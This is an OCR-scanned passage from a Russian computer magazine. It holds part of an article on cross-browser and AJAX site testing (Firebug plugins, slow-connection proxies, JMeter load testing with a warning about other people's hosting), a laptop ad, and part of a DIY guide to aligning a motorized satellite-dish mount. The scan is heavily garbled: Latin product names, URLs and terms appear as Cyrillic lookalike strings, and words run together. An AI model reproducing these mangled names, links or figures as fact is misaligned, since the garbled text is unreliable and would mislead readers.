сразу в нескольких версиях ІЕ — 5.5, 6.0, 7.0 и даже в бета-вер- 
сии ІЕ8. Представь, насколько удобнее загрузить всего один 
пакет размером около 25 Мб и установить его какобычную 
программу, вместо часовой возни с настройкой разных 
браузеров или, что еще сложнее, развертыванием двух -трех 
виртуальных машин! Через несколько минут послеустанов- 
ки ты сможешь лицезреть сайт в основных браузерах — из 
прошлого, настоящего и даже будущего, просто переключаясь 
между вкладками. 

Правда, без ручной работы не обойтись. Чего бы хотелось 
по-настоящему — такэто специального пакета, включа- 
ющего средство для автоматической записи скриншотов 
на разных браузерах. Ата кже средства для их быстрого 
сравнения (чтобы не играть в увлекательный квест в стиле 
«найди 10 отличий»). И такие пакеты есть! Например, для 
связки іпіегпеі; Ехріоге и МогіОа разработан специальный 
продукт РаеззІегЗіІе Іпзресіог ( ѵѵѵѵѵѵ.раезгІег.соппЛооІг/ 
рзі ]. включающий в себя сразу два браузных движка ІЕ и 
Оеско с мощными средствами для сравнения результатов 
их работы. Ксожалению, в нем нет поддержки Орега и 
Эаіагі, за которую многие бы сказали большое спасибо. А 
пока же мы будем всячески благодарить разработчиков 
замечательнейшего онлайн-сервиса ЬирУ/ЬгоѵѵзегзЬоІз. 
огд . В чем его смысл? Это очень простой инструмент, 
который создаетскриншоты заданного сайта сразу в 
нескольких браузерах, причем разных версий и на разных 
платформах (Еіпих, ѴѴіпбоѵѵз, МасОЭ). Ты сам указываешь 



нужные параметры, с которыми будет проходить тест — глу-| 
бину цвета, разные версии 5аѵа5сгір1: (пригодится для 
тестирования А5АХ «штучек»), включаешь или выключа- 
ешь 5аѵа и поддержку ЕІазЬ. Для проведения теста нужно 
ввести адрес сайта, выбрать из шести десятков нужные 
браузеры и отправитьзапрос в очередь. Через некото- 
рое время на экране появится результат (все скриншоты 
можно скачать одним архивом). Кстати говоря, исходники 
сервиса распространяются совершенно бесплатно с от- 
личной документацией, поэтому что-то похожее ты можешь 
замутить и сам. 

г ТЕСТИРОВАНИЕ И ОТЛАДКА 

СЛОЖНЫХ ВЕБ-ПРОЕКТОВ И А^АX-ПРИЛОЖЕНИЙ 

Если ты поддался модным тенденциям и создаешь 
сложное А5АХ веб-приложение, то простым просмотром 
в разных браузерах не обойтись. В дело вступаеттяжелая 
артиллерия в виде специальных программ-отладчиков 
и других средств. Посмотрим, что можно сделать с их 
помощью. Твой первый и главный инструмент — это связка 
браузера МогІЕа Еігеіох и замечательнейшего плагина 
РігеЬид ( ѵѵѵѵѵѵ.деиігеЬид.сопп ). Из всех плагинов для веб- 
разработчиков именно ЕігеЬид является самым мощным и 
развитым средством. А если к не му добавить несколько до- 
полнительных плагинов (да-да, именнотак— плагинтакже 
может содержать свои плагины), то он вообще оставляет 
позади даже специализированные инструменты и коммер- 
ческие решения! Хотя ЕігеЬид сможетоказать вам просто 
неоценимую помощь еще на стадии разработки проекта, 
сейчас нам более интересно использовать его для иссле- 
дования уже созданного и вполне работающего сайта. 
Поэтому настроим ЕігеЬид так, чтобы он активировал свои 
отладочные функции для нашего сайта — и вперед! 

В первой вкладке Сопзоіе перед вами откроется импрови- 
зированная консоль, где будут отслеживаться все запросы 




> ѵѵагпіпд 

Нагрузочноетес- 
тирование чужого 
хостинга чревато 
последствиями! Ад- 
министратор может 
подумать, что ты 
устраиваешь ППоЭ- 
атакуи предпринять 
меры (например, на- 
писать АЬ и зе-жа л обу 
твоему прову). 




> СІѴСІ 

Упомянутые в статье 
программы ты легко 
найдешь на нашем 
□ѴП-приложении. 
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> іп^о 

Для нагрузочного 
тестирования есть 
отличный коммер- 
ческий продукт 

— ѴѴеЬзегѵегЗігезз 
Тооі 7 [ Ьир://ѵѵѵѵѵѵ. 
раеззіег.сот/ 
уѵеЬзІгезг ). Он поз- 
воляет тестировать 
только веб-прило- 
жения и содержит, 

в отличие от ^Ме1:ег, 
встроенный прокси 
для имитации раз- 
личной скорости до- 
ступа к сайту. Можно 
задавать различные 
Озегадепіз для вир- 
туальных посети- 
телей и раздельно 
настраивать за груз ку 
изображений, стилей, 
внедренных флеш- 
объектов и апплетов, 
а также обрабатывать 
фреймы. Интерфейс 

— более наглядный 
и дружественный к 
пользователю. 

В результате теста 
формируется краси- 
вый отчете диаграм- 
мами и графиками 
загрузки (в виде 
НТМІ-страницы или 
сразу ѴѴогсІ-файла), 
отлично действующи- 
ми на менеджеров за- 
казчика. В остальном 
функциональность 
пакета идентична 
открытому ^Ме1:ег. 



со страницы, выводиться все предупреждения или ошибки, 
есл и та ки е б ы л и в п ро цессе за груз ки . Ты м оже ш ь отсл ежи вать 
какобщую активность, так и вещи более глубокие. Например, 
ошибки обработчика С55-стилей (особенно будет ценно при 
работе с версткой и подгонкой ее к разным браузерам), движка 
обработки ^аѵа5сгір1: (теперьты никогда не пропустишь ситуа- 
ции, что какой-то из скриптов неправильно работает или прос- 
то подозрительно себя ведет), ошибки обработки ХМІ-данных 
и даже ошибки расширений. Другие вкладки предоставляют 
подробную информацию о каждом аспекте страницы: 

•НТМІ показывает полную структуру страницы, а также, в 
режиме реального времени, позволяет изменять любой ее 
элемент и просматривать, какие С55-стили применяются 
к каждому элементу. То есть, если тебя спросят: а чего вот 
этотзаголовоктакого сине-малинового цвета и смещен 
куда-то, — ты сможешь аргументировано показать, где 
именно и почему произошло наложение стилей в верстке и 
надавать по рукам нерадивому дизайнеру. Кнопка Іпзресі: 
позволяет указать мышью любой элемент на странице и, 
разворачивая внизу его код, сразу изменить и посмотреть 
результат. 

• С55 служит для гибкого управления стилями — можно 
мгновенно включить и отключить любой из них, моментально 
оценивая результат. Больше не будет вопросов — «а какже 
это сделать?». Просто включи на любой странице плагин и 
исследуй код. 

• Бегірі — это самый настоящий отладчикдля ^аѵа5сгір1;, под- 
держивающий точки останова, пошаговый отладчики даже 
подсветку синтаксиса (при помощи плагина ПаіпЬоѵѵ). 

•□ОМ — список всех объектов, доступных на странице: здесь и 
компоненты ^аѵа5сгір1:, например, создаваемые популярными 
А^АX-библиотеками, и доступные всем глобальные объекты 
браузера. Эта вкладка более ценна во время непосредствен- 
ной разработки сайта. 

• Меі держит под контролем сетевую деятельность 

и показывает все запросы с вашей страницы, начи- 
ная от загрузок С55-стилей и рисунков и заканчивая 
ХМІНТТРПериезІ:, который используется А^АX-библио- 
теками. Можно просмотреть полный текстзапроса, ответ 
сервера и все НТТР-заголовки. На этой вкладке для нас 
интереснее всего временная диаграмма загрузки, которая 
показывает, как именно и в какой последовательности 
браузер загружает все части страницы. Тут кроется поисти- 
не неограниченное поле для оптимизации. Если заказчик 
жалуется на медленную загрузку сайта или «заторможен- 
ность» каких-то его частей, вполне возможно, что ответ 
найдется на вкладке МеТ Достаточно загрузить сайт и про- 
анализировать затрачиваемое на полную загрузку время. 
Для подробной статистики использования Соокіе 
тебе потребуется еще один плагин — Рігесоокіе ( ѵѵѵѵѵѵ. 



5о1Ц 1 : 1^ Лігесоокіѳ ). Он добавляет панель 

для расширенной работы с «печеньками». Если хочешь 
посмотреть, как работаеттвой А^АX-скрипт, и, собственно, 
что же там так безбожно тормозит, тебе просто необходим 
плагин (Щудй^сош) ■ Он поможет визуально (а значит, 
красиво и просто) посмотреть, сколько времени уходит на 
отработку каждой ^5-функции и в какой последователь- 
ности они вызываются. Также с ним можно разобраться 
во внутреннем устройстве любых А^АX-фреймворков и 
рассказывать потом друзьям за пивом, чего же там разра- 
ботчики в)0иегу «нагородили». 

Еще один отличный плагин — УЗІоѵѵ ( сІеѵеІорег.ѵаЬоо.сопп/ 
ѵзіоѵѵ ) отУабоо. Помимо того, что он сообщает статистику 
загрузки, он еще и попытается сделать за тебя часть рабо- 
ты. Сам проанализирует все данные о заданной странице 
и ее частях, посмотрит, какона загружается, и выдаст 
список рекомендаций, какты можешь оптимизировать 
ресурс. Советы достаточно толковые и четкие, поэтому ре- 
комендую прислушиваться. Подобную функциональность 
предоставляетеще и онлайн-сервис от наших разработ- 
чиков — ѴѴеЬо.іп ( Ьир://ѵѵеЬо.іп ). Совершенно бесплатно 
он всесторонне проверит сайт, после чего даст дельные 
советы по его оптимизации (и да, все на русском языке!). 

г КАРАУЛ! ЧТО С ИНТЕРНЕТОМ? 

С каналом на 100 Мбит/с часто даже не замечаешь процес- 
са загрузки страницы. Набираешьадрес — вжик— и все! 
Совсем другая картина будеттам, где до сих пор за сказку 
считают 64— 128 Кб каналы. Конечно, для обычной страни- 
цы с двумя абзацами текста и парой картинок скорость не 
является ключевым значением, но уже для какого-нибудь 
форума или веб-портала разница будетзаметна. Посети- 
тель скорее уйдет с сайта, чем будет ожидать минуту или 
больше, пока все загрузится. Поэтому обязательно нужно 
проверить, как будет выглядеть сайт, когда реальные юзе- 
ры начнут подключаться с разной скоростью. Для сложных 
А^АX-приложений скорость может влиять на порядок 
загрузки файлов и часто определяет скорость реакции 
интерфейса. Так что, скрепя сердце, нужно посмотреть, как 
все будет работать и на более медленных каналах. Для это- 
го существует совершенно простая программка — прокси- 
сервер Зіоору ( ир://ѵѵѵѵѵѵ.сІаиаѵѵаѵ.сопп/5[оррѵ/ ). Минимум 
настроек: запустил, указал сайт, выставил скорость (от 9.6 
Кб до 512 Кб), порт — и готово. Теперь открой свой сайт (ад- 
рес вида ІосаІбозЕуказанный порт) и наслаждайся (если 
сильно повезет) процессом загрузки своего детища на 
диал-апе или обычном ОЭЕ-соединении. Результаты могут 
расстроить, но лучше о них знать и заранее предпринять 
какие-то меры, прежде чем толпа озлобленных юзеров 
просто забьет на «тормозной ресурс». 



► 028 
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СОЗДАН ДЛЯ 
ВДОХНОВЕНИЯ 



> Новый ноутбук РЗОО с 
процессорной технологией 
1п1:е1® Сепігіпо® не только 
является мощным и привле- 
кательным, но и сочетает в 
себе гораздо больше. Неко- 
торые называют его универ- 
сальным помощником в 
решении любых повседнев- 
ных задач. 



> Мы называем его 
«Интеллектуальная красота». 
Создано ТозИіЬа. 

Информационный центр: 

8 - 800 - 100 - 05-05 [города РФ] 
8 - 495 - 983 - 05-05 [Москва) 

ѵѵѵ\/ѵѵ.(08ІііЬа.сот.ги 



Іп^еІ, логотип ітеі, Сепігіпо, Сеп^гіпо Іпзібе, ІпіеІ Соге и Соге Іпзібе являются товарными знаками корпорации ітеі в США и других странах. На правах рекламы 





Ё 0005 своими РУКАМИ 

Любой раскрученный сайт подвергается огромным нагрузкам — ре- 
гулярным и иногда пиковым, когда на сайтзаходит максимальное 
количество пользователей. Поэтому одним из важнейших видов 
тестирования считается «ООоЗ-атака своими руками». Нагрузочное 
тестирование, как его правильно называть, дает понять, какой наплыв 
посетителей может выдержать сервер. Как это делается? А прямо 
в лоб! С помощью специальных программ мы будем имитировать 
заход (и выполнение определенных действий) некоторого количества 
посетителей, а по завершению теста — смотреть на результат. Система 
тестирования подсчитывает время отклика для каждого «виртуала», 
выясняет, произошли ли какие-нибудь ошибки, а также показыва- 
ет— сколько же запросов в секунду может вытянуть твоя система. 
Подобным образом мы проверяем нетолько сам сайт, но и всю связку: 
оборудование, операционную систему, веб-сервер и СУБД. Естествен- 
но, для создания подобной нагрузки достаточная мощность нужна и на 
самом компьютере, откуда будут запускать программы тестирования. В 
качестве инструмента мы выберем открытое ПО, разрабатываемое под 
эгидой АрасЬе Рипсіабоп — разработку АрасЬе^Ме^ег [ Ы:1:р://]акаг1:а. 
арасбе.огд/]те1:ег/ ). 

Проект ^Ме^ег — это универсальная платформа для тестирования 
почти любых сетевых серверов или сервисов. С ее помощью можно 
сформировать запрос в любом формате, собрать всю информацию об 
его обработке, сетевых задержках и произвести анализ ответа сервера 
(например, НТТР-заголовков). Полученный ответ сервера без труда 
можно разобрать регулярным выражением или же проверить на при- 
сутствие определенного текста. Программа работает в несколько по- 
токов, и мы имитируем нужное нам количество пользователей. Любые 
действия задаются с помощью специального мастера, который в конце 
работы создаеттак называемый план тестирования. Регламентируются 
задержки перед подключением каждого следующего посетителя, а 
параметры запросов могут быть всячески настроены (к примеру, без 
проблем можно поставить соокіе и задать нужные опции). Для люби- 
телей экспериментов есть развитые возможности программирования 
поведения тестовых запросов — доступны различные конструкции 
іДіпсІисІе/Іоор, таймеры и многое другое. Крометестирования веб-про- 
ектов (то есть, НТТР-сервера), доступнотестирование под нагрузкой 
и РТР-сервера, 50АР/ХМЕ-РРС сервисов, ^М5 и ЮАР, а также тест 
баз данных ^^ВС. Результаты выводятся в виде подробного отчета о 
каждом запросе, предоставляется и итоговый, с общими результатами 
— количество успешных запросов, среднее время обработки, процент 
ошибок и тому подобное. 

Но хватиттеории, давайте что-то нагрузим! Возьмем локальный 
веб-сервер, где есть самая обычная страничка. Первый тест будет не- 
сложный: мы посмотрим, справится ли сервер с нашествием большого 



количества желающих. Сейчас и тестовый сервер, и ^Ме1:ег физически 
на одной машине, хотя для реальныхтестов их надо разносить или 
даже кластеризировать. Тестер создает очень большую нагрузку, а сер- 
вер — нагрузку еще больше. Учти: администраторузла, для которого ты 
хочешьустроить испытание, вероятнее всего, оченьудивится и едва ли 
обрадуется. Итак, запускаем ^Ме1:ег и создаем план для тестирования. 
Сначала задается группа потоков (ТбгеасІ Сгоир), где нужно указать 
количество пользователей, количество повторов, а также задержку 
между их подключением. Чтобы упростить задачу, мы обойдемся пока 
обычными СЕТ-запросами куказанной НТТР-странице и посмотрим, 
каксервер с этим справится. Для этого к нашей группе нужно приме- 
нить действие «Затріег НТТР Рериезі:» (обычный НТТР-запрос). 
Заполним его параметры: ІР-адрес или имя тестируемого сайта, порт 
(в случае необходимости), кодировку запроса, атакже путь (в нашем 
случае это и есть корневая страница сайта). Не забудь включить опцию 
«Реігіѵе Аи ЕтЬесІсІесІ гезоигсез І^гопп НТМЕ». Мы же хотим проверить 
реальные действия браузера, поэтому нам нужно кромезапроса основ- 
ной страницы загружать и все включенные в нее ресурсы: изображе- 
ния, С55- и ^5-файлы. Словом, все, что загружаетобычный посетитель. 
Что ж, шаблон создан: теперь каждый виртуальный пользователь 
(поток) будет использовать эти настройки для составления запросов. 
Следующий шаг — необходимо указать программе, каким образом об- 
рабатывать результат проверки. Ктестовому плану придется добавить 
еще и обработчики результатов (Еізіепег). Для оценки общей картины 
идеально подходит Зит тагу НерогС а для детальной информации 
о ходе обработки каждого запроса лучше всего использовать Ѵіеѵѵ 
НезиІІзТгее (это больше подойдет, если запросову вас нетакмного). 
План тестирования готов! Для начала работы осталосьтолько со- 
хранить конфигурацию нашего тестового плана и запустить его на 
выполнение через меню Пип. Учти, если ты задашь большое количес- 
тво пользователей, то тест будет длиться довольно долго и достаточно 
сильно нагрузит компьютер (неважно, что у тебя последний Соге 2 Оио). 
Процесстестирования отображается в реальном времени в Еезиііз 
Тгее. Если хочешь больше визуализации, можешь добавить еще и 
Сгарб Еезиііз. Как оценивать результаты? Для полной интерпретации 
нужна серьезная подготовка, однако общие выводы можно сделать 
почти сразу. Например, смотря на Бит тагу ЕерогС ты увидишь при- 
мерное количество запросов страницы, которое может выдержать твой 
сервер. Допустим, это 1 00 запросов в минуту. Теперь подумай, а есть ли 
в твоем приложении кэширование? Попробуй включить и прогнать тест 
заново — уверен, результат не заставит себя ждать. Затем начинается 
кропотливая работа: сюда входят изменение настроексервера, опти- 
мизация самого приложения, очередной за пуск теста. Гордись, теперь 
вместо сомнительного заключения «на глаз», ты способен получить 
вполне конкретные данные. ^ 
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Спутниковая антенна — предмет исключительно точный. Градус вправо, 
градус влево — и сигнала уже не будет. Чтобы «поймать» другой спутник с 
нужным каналом или провайдером, приходится подолгу перенастраивать 
антенну. Но если установить ее на моторизированный подвес, она будет на- 
страиваться самостоятельно! 



путниковые параболические антенны обладают высоким коэф- 
фициентом усиления, который необходим для приема слабых 
сигналов со ситника и, какследствие.оченьузкой диаграммой 
направленности. Из-за чего приходится изменять положение 
антенны, когда требуется настроиться на другой спутник. Это сильно ослож- 
няетжизнь любителям спутникового приема. Есть несколько способов обойти 
проблему: либо поместить несколько конвертеров на одну антенну, л ибо 
установить несколько антенн или антенн со сложной геометрией. Каждый из 
способов обладает как преимуществами, так и недостатками. Есть еще один 
способ — это установка антенны на моторизированный подвес, устроенный 
таким образом, что антенна при своем повороте отслеживает практически 
все видимые спутники. Слово«моторизированный»указываетнато, что 
настраиваться антенна будет автоматически. Используемый в этом случае 
тип подвески называется полярным. Названиеон получил от полярной звез- 



ды, потому что ось вращения этой конструкции при настройке должна быть 
параллельна оси вращения Земли и направлена на эту самую звезду. 
Конструкция полярного подвеса претерпела множество модификаций. 
Самым универсальным считается мотоподвес, состоящий из: 

• электрического двигателя небольшой мощности; 

• редуктора; 

•устройства управления двигателем; 

• приспособления для крепления спутниковой антенны, адаптированного 
под многие спутниковые антенны с фиксированной аз и мута л ьн о -у гл о мест- 
ной подвеской; 

• собственного крепления на опору с возможностью всех необходимых 
регулировок. 

Конечно, мотоподвес не лишен недостатков. Один из самых сущес- 
твенных — это скорость перемещения отпозиции кпозиции. С ней 
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приходится мириться. Менее существенный 
— ограничение по диаметру антенны, обычно не 
более 1 ,2 м. Этот недостаток все больше сводится 
к минимуму, так как появляется множество 
спутников, зона покрытия которых перекрывает 
значительную территорию России и необходи- 
мость в больших антеннах отпадает. 

Приобрести комплектспутникового приема не 
составиттруда. Сейчас существует множество 
специализированных фирм, занимающихся 
продажей и установкой. При покупке навер- 
няка посоветуют необходимое оборудование 
для приема желаемых спутников, ктомуже, 
адаптированное под местныеусловия приема. 
Покупку оборудования и установку обычной 
антенны мы подробно рассмотрели в статье 
«Спутниковые радости» (на дискеты найдешь ее РОР-версию). В 
качестве хорошего варианта мотоподвеса можно порекомендовать 
популярный Бігопд 5РТ ОМ-21 00 (стоит около 2-3 тысяч рублей). 
Установка и настройка антенны — процесс непростой. Тем более, если 
приобретается антенна с мотоподвесом. Этотребуетопределенных 
навыков, знаний и, чаще всего, денег. Цена установки удерживает начи- 
нающего радиолюбителя отустановки — но нетолько она. Есть ведь еще 
и любопытство, желание разобраться страблами самому, реализовать 



свои творческие возможности и технические способности. Если ты такой 
чел — статья написана для тебя. 



В ЧЕРПАЕМ ЗНАНИЯ 



Какяуже отметил, процесс установки моторизированного подвеса доста- 
точносложен. Поэтому прежде чем перейти к практике, придется набраться 
терпения и изучить теорию. Постараюсь объяснить все как можно проще. 
Идея использования геостационарных спутников для связи высказы- 
валась еще К. Э. Циолковским и словенским теоретиком космонавтики 
Германом Поточником. Преимущества геостационарной орбиты получили 
широкую известность после выхода в свет научно-популярной статьи 
Артура С. Кларка в журнале «ѴѴігеІеззѴѴогШ» в 1945 году. Он предсказывал, 
что искусственный спутник Земли, выведенный на круговую экватори- 
альную орбиту на высоту 35786 км, будет обращаться вокругЗемли за 24 
часа. Для наблюдателя, находящегося на Земле, этот спутник всегда будет 
находиться на одном месте, поэтому орбита такого спутника называется 
геостационарной. Если представить все спутники, находящиеся на гео- 
стационарной орбите, то в южной части неба, для северного полушария, 
цепочка спутников выстроится в дугу. Эта дуга в честь Артура Кларка 
была названа поясом Кларка. Самый верхний с пути и к будет тем выше, чем 
южнее находится наблюдатель. На экваторе верхний спутник будет прямо 
над головой, и пояс Кларка будет выглядеть ровной линией — делить небо 
на две равные части. Каждый спутник имеет свою орбитальную позицию. 
Она определяется меридианом, над которым спутник располагается. 
Например, известныйтелевизионный спутник НоіВігсІ находится над 
меридианом 13 градусов восточной долготы, поэтому и его позиция пи- 
шется, как 13Е. Теперь, когда ты стал просвещенным человеком, разберем 
несколько терминов, которые понадобятся нам для настройки. 

Угол места, или угол возвышения — это угол между линией горизонта и на- 
правлением на спутнике вертикальной плоскости. Чем ближе орбитальная 
позиция спутника к географической широте места приема, тем большеугол 
места, — и тем выше спутник над горизонтом. По мере удаления орбиталь- 
ной позиции от географической долготы угол места уменьшается. В конце 
концов, становится отрицательным (спутник ста кой орбитальной позицией 
скрывается за горизонтом). 

Азимут — это направление на спутнике горизонтальной плоскости. Азимут 
спутника, орбитальная позиция которого со в падает с долготой места при- 
ема, будет равен 1 80°, то есть антенна смотрит строго на юг. Азим^ и угол 
места рассчитываются, в зависимости от координатантенны и положения 
спутника. Формулы приведены во врезке. 

Элевация — именно это и есть один из важнейшихуглов для настрой- 
ки полярной подвески спутниковой антенны. Чтобы антенна могла 
принимать все доступные спутники, она должна поворачиваться вокруг 
определенной оси. Ось называется полярной и должна быть параллель- 
на земной оси. На экваторе полярная ось параллельна земной поверх- 
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> ѵѵагпіпд 

Работая на крыше 
или просто на высоте, 
будь предельно 
осторожен. Никакое 
телевидение и ско- 
ростной интернет не 
стояттвоей жизни. 




> СІѴСІ 

На диске ты найдешь 
необходимые файлы 
и программы для 
проведения расче- 
тов, а также поясня- 
ющие фотографии в 
высоком разреше- 
нии. 



ности, а чем севернееточка приема, тем на меньший угол от 
вертикали будет отличаться наклон полярной оси. Так вот, 
элевация и есть угол, на который наклонена полярная ось 
относительно вертикали. 

Следующий термин — деклинация. Если мы выставим только 
угол элевации для оси вращения антенны, то ни одного спут- 
ника нам не принять. «Луч» отантенны будет рисовать в небе 
прямуюлинию высоко над всеми спутниками. Чтобы испра- 
вить эту ситуацию, антенну следует на клонить относительно 
полярной оси на определенный угол. Этотугол называется 
углом деклинации. 

Помимо этого — есть та кое понятие, как корректирующий угол. 
Мы знаем, что длятого, чтобы наша антенна поворачивалась, 
направляя свой «луч»точно на спутники, необходимо выста- 
вить углы элевации и деклинации. Но не все та к, какхотелось 
бы. Если настроить мотоподвес по углам элевации и деклина- 
ции, рассчитанным по приведенным формулам, антенна будет 
своим «лучом» описывать в небе дугу, немного отличающуюся 
от дуги пояса Кларка. Это весьма нежелательно. И чем больше 
увасантенна,тем сильнее погрешность будет сказываться на 
приеме. Чтобы избежать этого неприятного момента, вводится 
небольшая поправка — корректирующий угол. Обычно он не 
превышает одного градуса. На величинуэтогоуглауменьша- 
ютсяуглы деклинации и элевации. 

Угол поворота полярной подвески — это угол, на который 
нужно повернутьантенну вокруг полярной оси (относительно 
направления на юг) для настройки на определенный спутник. 
На первый взгляд, кажется, что этотугол должен быть равен 
разнице между азимутами спутника и азимутом направления 
на юг... ноэто в корне неправильно. Отрицательное значение 
угла означаетповоротполярной подвески на запад относи- 
тельно южного направления, положительное — на восток. 
Полярный мотоподвес приспособлен под установку офсетной 




антенны, поэтому речь пойдет как раз отаком типе антенн. 
Название офсетной антенны говоритотом, что фокусу нее 
смещенный. Конвертер вынесен иззоны затенения зеркала 
антенны. Именно поэтому «луч» антенны не перпендикулярен 
плоскости раскрыва антенны, а направлен выше — как раз на 
угол офсетности. Благодаря этому, офсетная антенна не смотрит 
в небо, как прямофокусная, а располагается почти вертикаль- 
но. Угол офсетности можно найти в паспорте на антенну. Если 
паспорта нет, этотугол можно рассчитать (смотри врезку). 

Для крепления антенны на мотоподвесах используется отре- 
зоктрубы, закрепленной на оси силовой шестерни редуктора. 
Эта труба получила название «хобот» (потому что она имеет 
изгиб и со стороны действителен о напоминаетхобот слона). 
Изгиб нужен, чтобы сделать конструкцию универсальной: на 
нее крепится без доработки большинство антенн с азимуталь- 
но-угломестной подвеской. Чтобы максимальноупростить 
процедуру настройки подвески и сделать правильные расче- 
ты, понадобится знать, на какой угол за гнут «хобот» у мотора. 
Этотугол обычноуказывается в паспорте на мотор и обычно 
составляет 30°, но бывают моторы суглом изгиба «хобота» 

35 и 40 градусов. Если в паспорте на моторугол неуказан (вот 
незадача!), придется его измерять подручными средствами 
— линейками, транспортирами, у кого на что хватит выдумки. 

г СБОРКА АНТЕННЫ В ДОМАШНИХУСЛОВИЯХ 

Ну вот, после долгого и нудного изучения теории со страшны- 
ми формулами пришло время применить свежеполученные 
знания на практике. Мне воттоже всегда хотелось пощупать 
сначала все руками, книжек не читать — но, увы, каждый раз 
убеждался, что практика без теории никуда не годится. 

В качестве примера приведу«реальные данные для установки 
и настройки антенны с мотоподвесом» — или как это делалось 
в Нижнем Новгороде. Тебе же придется произвести расчеты 
уже со своими географическими координатами, размерами 
антенны и параметрами мотоподвеса. 




Географические координаты места приема 


Широта ГаГ 


= 56.2 ° 


Долгота Гонд 


= 44.2 ° 


Радиус земли Кз 


= 6378 км. 


Радиус орбиты Корб 


= 42233 км 


Антенна Соібен ІнРегзбаг 


0.9м. 


Большой диаметр антенны В 


= 980 мм. 


Малый диаметр антенны б 


= 900 мм. 


Мотоподвес Збгонд ЗКТ ВМ-2100 




Угол изгиба «хобота» мотора т 


= 30° 



Расчеты, какуже было сказано, можно произвести вручную 
или посчитать в ЕхсеГе, вбив исходные данные в специально 
подготовленный хіз-файл. Так или иначе, получится следую- 
щий результат: 

Поправка = 0.623° 

Элевация = 33.11° 

Деклинация = 7.23° 

Угол офсетности = 23.3° 
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Установи ть деклинацию можно прямо дома, воспользовавшись обычно^ 
ЯинейкойІ 







Все необходимыеуглы для настройки подвески у насесть, осталось их 
правильно применить. Практика установки и настройки полярной подвески 
подсказала, что можно большую часть процедуры выполнить дома, на удоб- 
ном столе. Для этого понадобится небольшой отрезок ровной трубы диа- 
метром 25-42 мм и длиной, немного больше большого диаметра антенны. В 
моем случае 1-1.2 м. Антенну необходимо собрать согласно инструкции по 
сборке. Штангу конверте роде ржател я можно пока не уста на вливать: будет 
удобнее выставлять углы. Итак, зажимаем трубу в хом^ы крепления под- 
вески так, как будто это опора, а антенну кладем вниз зеркалом на ровную 
поверхность (например, на большой стол или просто на пол). 

Приступаем кпервому этапу — установке деклинации. Нам нужно выставить 
трубу относительно плоскости зеркала антенны под углом деклинации с 
учетом угла офсетности иугла изгиба хобота. Это значение можно получить 
по нехитрой формуле — у меня получается 0.53°. 

Самый простой способ выставитьугол — это метод прямоугольного 
треугольника. Один из катетов нам известен (большой диаметр антенны), 
необходимо рассчитать дли ну второго катета: Ь = 9 мм. 

Угол в моем случае положительный, поэтому расстояние оттрубы до кромок 
антенны сверху должно быть больше, чем снизу, на величину Ь. Аккуратно 
изменяя положениетрубы, добиваемся как можно более точного соот- 
ветствия разницы между расстояниями сверху и снизу. Если угол отрица- 
тельный, то снизу расстояние должно быть больше, чем сверху. Замечу, что 
формулы я привожу для пониманиятого, почему мы делаем именнотак, а не 
иначе. Естественно, высчитывать это на бумаге необходимости нет; все лег- 
ко просчитывается в Ехсеіе с помощью специального файла с расчетами. 
Перед установкой мотора необходимо проверить, чтобы он был установлен 
в нулевую позицию. Лучше всего подключитьего кприемнику и выполнить 
команду«ИдтивО». Хобот мотора зажимаем в хомуты крепления подвески 
так, чтобы мотор расположился строго перпендикулярно плоскости антен- 
ны. При этом хомуты крепления должны располагаться как можно ближе 
к подшипнику хобота, чтобы максимально уменьшить рыча г и уменьшить 
нагрузку на мотор. Перпендикулярность расположения мотора можно 
проконтролировать с помощью рулетки, измеряя расстояния с двух сторон 
до краев антенны: оно должно быть одинаковое. Следи затем, чтобы болты 
хомутов не доставали корпуса мотора при вращении хобота. 

Установка элевации— это следующий шаг. Большой точности тут не 



требуется, так как угол будет корректироваться при настройке антенны 
на месте. Достаточно выставить его по шкале мотора. Обрати внимание 
на то, что часто на моторе есть две шкалы: «Элевация» и «Широта» (не 
стоит их путать). Дотошный читатель возразит, что угол элевации можно 
выставить более точно, опятьже воспользовавшись методом треуголь- 
ника — но это совсем не обязательно. Конструкция под собственным 
весом провиснет, и угол элевации все равно придется поправлять. 

На этом предварительная настройка подвески завершена. Соберем антен- 
ну окончательно, установив штангу конвертеродержателя. 

Н ВЫХОДИМ С АНТЕННОЙ НА УЛИЦУ 

Первое, что нужно сделать на месте — конечно, установить опору. Опора 
должна отвечать следующим требованиям: 

• максимально жесткая конструкция с возможностью регулировки верти- 
кальности трубы для крепления антенны; 

• надежное крепление кстене или иному основанию; 

•достаточный вынос для обеспечения антенне свободы при вращении 
мотора. 

Опора крепится коснованию при помощи анкерных болтов, сквозных 
шпилекили распорныхдюбелей. Лучше, чтобы количество крепежных 
элементов было больше и обеспечивало солидный запас прочности креп- 
ления. Труба для крепления антенны выставляется строго вертикально при 
помощи отвеса или строительного уровня. 

Все, — теперьосталось установить саму антенну и перейти к окончатель- 
ной доводке. Но прежде чем взгромождать антенну на опору, следует дома 
попробовать покрутить мотор, подключив его кприемнику. Есть два режима 
управления мотором: пошаговый и Н5АЕ5. Оченьхорошо, если мотор и 
приемник поддерживают режим 1)5АЕ5 — на мой взгляд, самый удобный 
режим. Для правильного функционирования необходимо установить в 
приемнике корректные географические координаты места приема (чтобы 
приемникмогправильно просчитать угол поворота). 

Затем нужно выбрать опорные спутники, по которым будем настраивать 
антенну. Опорных спутников должно быть, какминимум,три — вершинный, 
крайний западный и крайний восточный. В моей местности как нельзя лучше 
для вершинного подходит Еига5Іа5а1:42Е, потому что дол гота места — 44,2 гра- 
дуса и он ближе всего к южному направлению. Правило простое: чем ближе 
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Перпендикулярность расположен ия мотора можно проконтролировать с помощью рулетки, измеряя рассто^ 
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Благодаря форме офсетной антеі^ 
ны, ей не приходится «смотреть^ 
вверх подобно прямофокусной-^ 

Причем, сама антенна обладает] 

іак называемымуглом офсетное^ 



позиция вершинного спутника к географической долготе, тем лучше. Край- 
ними предпочтительно выбиратьхорошо принимаемыесп^ники, какможно 
ближе к краям дуги Кларка. В моей местности это — Уата[90Е и Зігіиз 5Е. 
Пришло время приступать ксамому интересному — кпоиску сигнала. Иде- 
альный вариант, когда удается разместить приемник и телевизор недалеко 
от места установки: чтобы можно былоуправлять приемником и видеть 
уровеньсигнала, отображаемый нателевизоре. Когда такой вариантневоз- 
можен, придется настраиватьантеннус помощником. Он будет управлять 
приемником и сообщатьуровеньсигнала. 

Устанавливаем антенну на заранее закрепленную и выставленную вер- 
тикально опору и слегка затягиваем гайки хомутов подвески так, чтобы 
антенну можно было с небольшим усилием поворачивать (предварительно 
ориентируем на юг]. Конвертер следуетустановить на штангу конвертеро- 
